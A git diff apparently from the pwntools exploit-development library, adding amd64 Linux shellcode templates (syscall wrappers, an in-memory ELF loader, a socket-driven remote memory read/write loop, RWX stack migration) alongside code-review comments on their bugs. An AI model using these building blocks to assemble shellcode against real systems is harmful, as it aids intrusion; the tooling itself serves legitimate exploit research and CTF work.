a/pwnlib/shellcraft/templates/amd64/linux/loader_append.asm b/pwnlib/shellcraft/templates/amd64/linux/loader_append.asm new file mode 100644 index 000000000..b649dbd8e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/loader_append.asm 
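Review bot: The mmap in load_one is issued with MAP_FIXED on the raw p_vaddr and its failure is deliberately ignored (`/* Ignore failure */`), yet the `rep movsb` that follows writes to that address unconditionally; a PT_LOAD whose p_vaddr is not page-aligned makes mmap return EINVAL, and as far as I can tell the copy then only survives because the over-allocation of an earlier segment happens to cover the range. Mapping from a page-aligned copy of the address (keep rdi for the copy, pass the address rounded down to a page and the size enlarged by the page offset to mmap) would make each segment independent, and a `test rax, rax` / `js ${die}` after the syscall would turn the remaining failures into a clean exit instead of a fault inside the copy. The comment `over-allocating space by 8x` does not match `shl rbx, 12 + 4`, which scales by 16; one of the two should change. The loop comment `For each section header, mmap it to the desired address` should say `program header`, and the docstring should state that every segment ends up RWX since callers may not expect that from a loader.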
@@ -0,0 +1,55 @@ +<% + from pwnlib.shellcraft.amd64.linux import loader + from pwnlib.shellcraft import common +%> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Similar to loader.asm but loads an appended ELF. + +Arguments: + data(str): If a valid filename, the data is loaded from the named file. + Otherwise, this is treated as raw ELF data to append. + If ``None``, it is ignored. + +Example: + + >>> gcc = process(['gcc','-m64','-xc','-static','-Wl,-Ttext-segment=0x20000000','-']) + >>> gcc.write(''' + ... int main() { + ... printf("Hello, %s!\\n", "amd64"); + ... } + ... ''') + >>> gcc.shutdown('send') + >>> gcc.poll(True) + 0 + >>> sc = shellcraft.loader_append('a.out') + +The following doctest is commented out because it doesn't work on Travis +for reasons I cannot diagnose. However, it should work just fine :-) + + # >>> run_assembly(sc).recvline() == 'Hello, amd64!\n' + # True + + +<%page args="data = None"/> +<% +elf_data = common.label('elf_data') +load = common.label('load') +%> + jmp ${elf_data} +${load}: + pop rax + ${loader('rax')} +${elf_data}: + call ${load} +%if data: +<% +import os + +if os.path.isfile(data): + with open(data, 'rb') as f: + data = f.read() +%> + ${'.string "%s"' % ''.join('\\x%02x' % c for c in bytearray(data))} +%endif diff --git a/pwnlib/shellcraft/templates/amd64/linux/lseek.asm b/pwnlib/shellcraft/templates/amd64/linux/lseek.asm new file mode 100644 index 000000000..2ac56f402 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} 
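Review bot: When `data` is a string that is not an existing file, `os.path.isfile(data)` is false and the string is embedded verbatim as the ELF, so a mistyped filename silently yields shellcode whose payload is the filename rather than a binary. A cheap guard before the `.string` line is `if not data.startswith('\\x7fELF'): raise ValueError('loader_append: data is neither ELF bytes nor a readable file')`, which also gives the docstring's `data(str)` description a concrete contract. Separately, `.string` appends a terminating NUL after the payload; harmless for the loader, but `.byte` or `.ascii` would embed exactly the file contents and avoid a reader wondering about the extra byte.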
diff --git a/pwnlib/shellcraft/templates/amd64/linux/lstat.asm b/pwnlib/shellcraft/templates/amd64/linux/lstat.asm new file mode 100644 index 000000000..c517f1709 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/lstat64.asm b/pwnlib/shellcraft/templates/amd64/linux/lstat64.asm new file mode 100644 index 000000000..c56f02205 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/madvise.asm b/pwnlib/shellcraft/templates/amd64/linux/madvise.asm new file mode 100644 index 000000000..423218bd6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/madvise.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, len, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, len, advice)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/membot.asm b/pwnlib/shellcraft/templates/amd64/linux/membot.asm new file mode 100644 index 000000000..bc0b68f93 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/membot.asm 
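Review bot: lstat64.asm invokes `SYS_lstat64`, but the amd64 syscall table has no lstat64 entry (it is a 32-bit interface; amd64 uses `SYS_lstat`), so this template cannot resolve its constant on the architecture it is filed under. The same applies to other generated templates in this series: `SYS_nice` in nice.asm, `SYS_pread`/`SYS_pwrite` in pread.asm and pwrite.asm (the amd64 names are `pread64`/`pwrite64`), `SYS_profil` in profil.asm (a libc function, not a syscall) and `SYS_readdir` in readdir.asm. Since these look generated from libc prototypes, the generator should filter on the target's syscall table, or each docstring should name the constant it expects so the mismatch is visible; verify each against the amd64 constants in pwnlib.constants before relying on them.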
@@ -0,0 +1,48 @@
+<% from pwnlib.shellcraft import amd64 %>
+<% from pwnlib.shellcraft import common %>
+<%page args="readsock = 0, writesock = 1"/>
+<%docstring>
+Read-write access to a remote process' memory.
+
+Provide a single pointer-width value to determine the operation to perform:
+
+- 0: Exit the loop
+- 1: Read data
+- 2: Write data
+
+<%
+start = common.label("start")
+read = common.label("read")
+write = common.label("write")
+done = common.label("done")
+bkpt = common.label("bkpt")
+%>
+
+${start}:
+ ${amd64.linux.readptr(readsock, 'rax')}
+ test rax, rax
+ jz ${done}
+ dec rax
+ test rax, rax
+ jz ${read}
+ dec rax
+ test rax, rax
+ jz ${write}
+ dec rax
+ test rax, rax
+ jz ${bkpt}
+ jmp ${done}
+
+${read}:
+ ${amd64.linux.readloop(readsock)}
+ jmp ${start}
+
+${write}:
+ ${amd64.linux.writeloop(readsock, writesock)}
+ jmp ${start}
+
+${bkpt}:
+ int3
+ jmp ${start}
+
+${done}:
diff --git a/pwnlib/shellcraft/templates/amd64/linux/migrate_stack.asm b/pwnlib/shellcraft/templates/amd64/linux/migrate_stack.asm
new file mode 100644
index 000000000..664600623
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/linux/migrate_stack.asm
@@ -0,0 +1,8 @@
+<% from pwnlib.shellcraft import amd64 %>
+<%page args="size=0x100000, fd=0"/>
+<%docstring>Migrates to a new stack.
+
+ ${amd64.linux.mmap_rwx(size)}
+ ${amd64.mov('rsp', 'rax')}
+
+ add rsp, ${hex((size * 3 / 4) & ~7)}
diff --git a/pwnlib/shellcraft/templates/amd64/linux/mincore.asm b/pwnlib/shellcraft/templates/amd64/linux/mincore.asm
new file mode 100644
index 000000000..cf5be4ebb
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/linux/mincore.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.amd64.linux import syscall
+%>
+<%page args="start, len, vec"/>
+<%docstring>
+Invokes the syscall mincore. See 'man 2 mincore' for more information.
+
+Arguments:
+ start(void): start
+ len(size_t): len
+ vec(unsigned): vec
+
+
+ ${syscall('SYS_mincore', start, len, vec)}
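Review bot: The membot.asm docstring lists opcodes 0, 1 and 2, but the dispatch chain also recognises a third value by jumping to `${bkpt}` and executing `int3`; document it with `- 3: Trigger a breakpoint (int3)` so a user of the protocol does not assume 3 means exit. Any other value falls through to `jmp ${done}`, which deserves one line as well, e.g. `Any other value exits the loop.`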
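Review bot: `${hex((size * 3 / 4) & ~7)}` in migrate_stack.asm relies on `/` being integer division; under Python 3 or `from __future__ import division` it produces a float and the `& ~7` raises TypeError, so write it as `add rsp, ${hex((size * 3 // 4) & ~7)}`. The `fd=0` page argument is never used in the body and should be removed or documented. The docstring `Migrates to a new stack.` should also say that `rax` is clobbered, that the new stack is an RWX mapping of `size` bytes, and that `rsp` is placed three quarters of the way up it.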
diff --git a/pwnlib/shellcraft/templates/amd64/linux/mkdir.asm b/pwnlib/shellcraft/templates/amd64/linux/mkdir.asm new file mode 100644 index 000000000..a465fa15a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mkdirat.asm b/pwnlib/shellcraft/templates/amd64/linux/mkdirat.asm new file mode 100644 index 000000000..f97f0b063 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mknod.asm b/pwnlib/shellcraft/templates/amd64/linux/mknod.asm new file mode 100644 index 000000000..8d7a02a12 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mknodat.asm b/pwnlib/shellcraft/templates/amd64/linux/mknodat.asm new file mode 100644 index 000000000..114bb0600 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mknodat.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mlock.asm b/pwnlib/shellcraft/templates/amd64/linux/mlock.asm new file mode 100644 index 000000000..d48d2f896 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mlockall.asm b/pwnlib/shellcraft/templates/amd64/linux/mlockall.asm new file mode 100644 index 000000000..f44787aa4 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mmap.asm b/pwnlib/shellcraft/templates/amd64/linux/mmap.asm new file mode 100644 index 000000000..ee407f0fe --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mmap.asm 
@@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, length, prot, flags, fd, offset"/> +<%docstring> +Invokes the syscall mmap. See 'man 2 mmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + flags(int): flags + fd(int): fd + offset(off_t): offset + + + ${syscall('SYS_mmap', addr, length, prot, flags, fd, offset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mmap_rwx.asm b/pwnlib/shellcraft/templates/amd64/linux/mmap_rwx.asm new file mode 100644 index 000000000..8af935b7c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mmap_rwx.asm @@ -0,0 +1,11 @@ +<% from pwnlib.shellcraft import amd64 %> +<%page args="size = 0x1000, protection = 7, address = None"/> +<%docstring>Maps some memory +<% + if address: + flags = 'MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED' + else: + flags = 'MAP_PRIVATE | MAP_ANONYMOUS' +%> + ${amd64.linux.mmap(address, size, protection,flags, 0, 0)} + diff --git a/pwnlib/shellcraft/templates/amd64/linux/mov.asm b/pwnlib/shellcraft/templates/amd64/linux/mov.asm deleted file mode 100644 index acb197ea5..000000000 --- a/pwnlib/shellcraft/templates/amd64/linux/mov.asm +++ /dev/null @@ -1,21 +0,0 @@ -<% - from pwnlib.shellcraft import amd64 - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context -%> -<%page args="dest, src, stack_allowed = True"/> -<%docstring> - -Thin wrapper around :func:`pwnlib.shellcraft.amd64.mov`, which sets -`context.os` to `'linux'` before calling. - -Example: - - >>> print pwnlib.shellcraft.amd64.linux.mov('eax', 'SYS_execve').rstrip() - push 0x3b - pop rax - - - -% with ctx.local(os = 'linux'): - ${amd64.mov(dest, src, stack_allowed)} -% endwith diff --git a/pwnlib/shellcraft/templates/amd64/linux/mov.asm b/pwnlib/shellcraft/templates/amd64/linux/mov.asm new file mode 120000 index 000000000..92f037c18 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mov.asm 
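Review bot: mmap_rwx.asm's `protection = 7` is a magic number; `'PROT_READ|PROT_WRITE|PROT_EXEC'`, the form loader.asm in this same patch uses, states the intent and resolves through the same constants path. The docstring `Maps some memory` should list `size`, `protection` and `address`, and say that a non-`None` address adds MAP_FIXED and therefore replaces whatever is already mapped there without any error being surfaced. There is also a stray `protection,flags` missing the space after the comma.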
@@ -0,0 +1 @@ +../mov.asm \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/amd64/linux/mprotect.asm b/pwnlib/shellcraft/templates/amd64/linux/mprotect.asm new file mode 100644 index 000000000..934d16fb1 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mprotect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, length, prot"/> +<%docstring> +Invokes the syscall mprotect. See 'man 2 mprotect' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + + + ${syscall('SYS_mprotect', addr, length, prot)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mq_notify.asm b/pwnlib/shellcraft/templates/amd64/linux/mq_notify.asm new file mode 100644 index 000000000..cc863d334 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mq_notify.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="mqdes, notification"/> +<%docstring> +Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information. + +Arguments: + mqdes(mqd_t): mqdes + notification(sigevent): notification + + + ${syscall('SYS_mq_notify', mqdes, notification)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mq_open.asm b/pwnlib/shellcraft/templates/amd64/linux/mq_open.asm new file mode 100644 index 000000000..12df46471 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mq_open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/amd64/linux/mq_timedreceive.asm new file mode 100644 index 000000000..4c2705b8a --- /dev/null 
+++ b/pwnlib/shellcraft/templates/amd64/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/amd64/linux/mq_timedsend.asm new file mode 100644 index 000000000..c6708f848 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mq_timedsend.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/amd64/linux/mq_unlink.asm new file mode 100644 index 000000000..6880fce56 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/mremap.asm b/pwnlib/shellcraft/templates/amd64/linux/mremap.asm new file mode 100644 index 000000000..89ceeafd6 --- /dev/null 
+++ b/pwnlib/shellcraft/templates/amd64/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/msync.asm b/pwnlib/shellcraft/templates/amd64/linux/msync.asm new file mode 100644 index 000000000..481ab4a01 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/msync.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/munlock.asm b/pwnlib/shellcraft/templates/amd64/linux/munlock.asm new file mode 100644 index 000000000..b74f530de --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/munlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/munlockall.asm b/pwnlib/shellcraft/templates/amd64/linux/munlockall.asm new file mode 100644 index 000000000..8f10acf27 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/munlockall.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/munmap.asm b/pwnlib/shellcraft/templates/amd64/linux/munmap.asm new file mode 100644 index 000000000..21382fb01 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munmap', addr, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/nanosleep.asm b/pwnlib/shellcraft/templates/amd64/linux/nanosleep.asm new file mode 100644 index 000000000..09e552854 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/nice.asm b/pwnlib/shellcraft/templates/amd64/linux/nice.asm new file mode 100644 index 000000000..cb2a3fe07 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} 
diff --git a/pwnlib/shellcraft/templates/amd64/linux/open.asm b/pwnlib/shellcraft/templates/amd64/linux/open.asm new file mode 100644 index 000000000..63fa7eca3 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/openat.asm b/pwnlib/shellcraft/templates/amd64/linux/openat.asm new file mode 100644 index 000000000..de1147886 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/openat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pause.asm b/pwnlib/shellcraft/templates/amd64/linux/pause.asm new file mode 100644 index 000000000..23489c12b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pause.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall pause. See 'man 2 pause' for more information. + +Arguments: + + + + ${syscall('SYS_pause')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pipe.asm b/pwnlib/shellcraft/templates/amd64/linux/pipe.asm new file mode 100644 index 000000000..13b1208a5 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pipe.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pipe2.asm b/pwnlib/shellcraft/templates/amd64/linux/pipe2.asm new file mode 100644 index 000000000..f9b14fc59 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/poll.asm b/pwnlib/shellcraft/templates/amd64/linux/poll.asm new file mode 100644 index 000000000..2abc61f03 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ppoll.asm b/pwnlib/shellcraft/templates/amd64/linux/ppoll.asm new file mode 100644 index 000000000..421fdac13 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ppoll.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} 
diff --git a/pwnlib/shellcraft/templates/amd64/linux/prctl.asm b/pwnlib/shellcraft/templates/amd64/linux/prctl.asm new file mode 100644 index 000000000..726df6c7a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="option, *vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, *vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/pread.asm b/pwnlib/shellcraft/templates/amd64/linux/pread.asm new file mode 100644 index 000000000..68c4465e8 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/pread.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/preadv.asm b/pwnlib/shellcraft/templates/amd64/linux/preadv.asm new file mode 100644 index 000000000..2b1c3d31f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/preadv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/prlimit64.asm b/pwnlib/shellcraft/templates/amd64/linux/prlimit64.asm new file mode 100644 index 000000000..98251829e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/prlimit64.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/profil.asm b/pwnlib/shellcraft/templates/amd64/linux/profil.asm new file mode 100644 index 000000000..e34eb1939 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/profil.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ptrace.asm b/pwnlib/shellcraft/templates/amd64/linux/ptrace.asm new file mode 100644 index 000000000..6008c98ec --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ptrace.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="request, *vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + 